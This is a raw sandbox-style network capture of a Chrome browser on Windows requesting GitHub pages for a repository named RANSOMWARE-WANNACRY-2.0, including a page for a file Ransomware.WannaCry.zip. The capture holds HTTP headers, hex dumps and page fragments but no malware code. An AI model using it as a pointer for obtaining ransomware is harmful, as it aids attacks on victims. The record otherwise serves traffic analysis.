                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:29 UTC436INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:29 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:29 UTC2915INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      140192.168.2.1649852140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC865OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tree-commit-info/master HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:29 UTC436INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:29 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:29 UTC2913INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      141192.168.2.1649853140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC854OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/branch-count HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:29 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:29 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"56a3b41b3adb53ca7fce5703eb10dacf"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:29 UTC2936INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:29 UTC87INData Raw: 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 22 3e 31 3c 2f 73 74 72 6f 6e 67 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 42 72 61 6e 63 68 3c 2f 73 70 61 6e 3e 0a
                                                                                      Data Ascii: <strong class="color-fg-default">1</strong><span class="color-fg-muted">Branch</span>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      142192.168.2.1649854140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:29 UTC757OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1115
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:29 UTC1115OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 20 c2 b7 20 47 69 74 48 75 62 22 2c 22 63 6f 6e 74 65 78 74 22 3a 7b 22 75 73 65 72 5f 69 64 22 3a 22 31 39 39 31
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","events":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2.0 GitHub","context":{"user_id":"1991
                                                                                      2024-03-23 14:47:29 UTC580INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:29 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.001674
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 91A4:2D54F7:2F3D0C:772FEB:65FEEB81
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      143192.168.2.1649856140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:29 UTC863OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/overview-files/master HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:29 UTC436INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:29 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:29 UTC2913INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      144192.168.2.1649855140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:29 UTC851OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tag-count HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:29 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:29 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8902c7088699d5c25402933819980cd9"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:29 UTC2936INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:29 UTC85INData Raw: 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 22 3e 30 3c 2f 73 74 72 6f 6e 67 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 54 61 67 73 3c 2f 73 70 61 6e 3e 0a
                                                                                      Data Ascii: <strong class="color-fg-default">0</strong><span class="color-fg-muted">Tags</span>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      145192.168.2.1649859140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:29 UTC1180OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: text/html, application/xhtml+xml
                                                                                      Turbo-Visit: true
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      If-None-Match: W/"2e999df221553a6425cb9a1091418301"
                                                                                      2024-03-23 14:47:30 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:30 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"735a9b8574e20549f7b39c0b84e573e8"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:30 UTC3021INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 36 38 44 34 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                      Data Ascii: 68D4<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
